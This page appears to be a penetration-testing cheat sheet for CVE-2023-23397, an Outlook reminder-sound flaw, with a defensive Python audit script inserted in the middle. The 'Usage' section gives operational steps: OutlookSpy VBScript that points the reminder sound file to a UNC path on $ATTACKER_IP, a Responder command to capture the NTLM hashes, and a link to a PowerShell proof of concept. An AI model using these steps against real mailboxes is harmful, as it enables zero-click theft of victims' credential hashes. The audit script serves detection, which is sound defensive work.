# Outlook Exploits

## CVE-2023-23397

Create an appointment with a custom, malicious reminder sound. The sound file is referenced through a __Universal Naming Convention (UNC)__ path and is stored on a server controlled by the attacker. Outlook authenticates to that server when it fetches the file, so the goal is to get the NTLM(v2) hashes. No interaction by the target is needed.


Therefore, __PidLidReminderFileParameter__ has to be altered to contain the UNC path, for example `\\$ATTACKER_IP:$ATTACKER_PORT\payload.wav`. The source of the file may use __SMB__ or __WebDAV__.
Further, __PidLidReminderOverride__ has to be set to __true__.
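
For triage, the two properties above are what a mailbox audit should look at. The following is an added example, not part of the original notes or of any vendor tooling: it classifies exported item records by whether the reminder sound points at a remote UNC host, and goes slightly beyond the page by also recognising the long `\\?\UNC\` form and `host@port` server names. The record layout, `TRUSTED_SUFFIXES` and the sample items are assumptions constructed for illustration.

```python
import re

# Assumption: internal DNS suffixes that may legitimately host sound files.
TRUSTED_SUFFIXES = (".corp.example",)

# Matches \\host\..., //host/... and the long form \\?\UNC\host\...
_UNC = re.compile(r"^(?:[\\/]{2}[?.][\\/]UNC[\\/]|[\\/]{2})(?P<host>[^\\/]+)[\\/]", re.I)

# Constructed sample records (not real mailbox data).
SAMPLE_ITEMS = [
    {"id": "A1", "PidLidReminderOverride": True, "PidLidReminderFileParameter": r"\\203.0.113.7\payloads\alert.wav"},
    {"id": "A2", "PidLidReminderOverride": False, "PidLidReminderFileParameter": r"C:\Windows\Media\Alarm01.wav"},
    {"id": "A3", "PidLidReminderOverride": True, "PidLidReminderFileParameter": r"\\files.corp.example\sounds\ding.wav"},
    {"id": "A4", "PidLidReminderOverride": True, "PidLidReminderFileParameter": r"\\203.0.113.7@8080\dav\a.wav"},
    {"id": "A5", "PidLidReminderOverride": False, "PidLidReminderFileParameter": r"\\?\UNC\198.51.100.9\s\a.wav"},
    {"id": "A6", "PidLidReminderFileParameter": ""},
]


def unc_host(path):
    """Return the server part of a UNC path, or None for local paths."""
    m = _UNC.match(path.strip())
    if not m:
        return None
    # Drop any @port / :port decoration so only the host name is compared.
    host = re.split(r"[@:]", m.group("host"), maxsplit=1)[0].lower()
    return None if host in ("?", ".", "") else host


def audit_item(item):
    """Classify one exported item record by its reminder properties."""
    path = item.get("PidLidReminderFileParameter") or ""
    host = unc_host(path)
    if host is None:
        return "ok"        # empty or local sound file
    if host.endswith(TRUSTED_SUFFIXES):
        return "review"    # remote but internal: confirm it is expected
    # Remote host outside the trusted namespace; worse with the override set.
    return "alert" if item.get("PidLidReminderOverride") else "suspicious"


def audit(items):
    """Map item id -> verdict for a list of exported records."""
    return {i["id"]: audit_item(i) for i in items}


if __name__ == "__main__":
    for item_id, verdict in audit(SAMPLE_ITEMS).items():
        print(item_id, verdict)
```
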

### Usage

`New Appointment` --> set `Reminder` to 0 minutes.

The `OutlookSpy` plugin is needed. Go to the `OutlookSpy` tab, press `CurrentItem` and go to `Script`.

Set the following variables:

```vbscript
AppointmentItem.ReminderOverrideDefault = true
AppointmentItem.ReminderPlaySound = true
AppointmentItem.ReminderSoundFile = "\\$ATTACKER_IP\payloads\alert.wav"
```

* Set up `responder -I <interface>` to catch the NTLM hash.

Press `Run` to save the variables. Send the appointment afterwards.

### Resources

* [api0cradle's Powershell POC](https://github.com/api0cradle/CVE-2023-23397-POC-Powershell.git)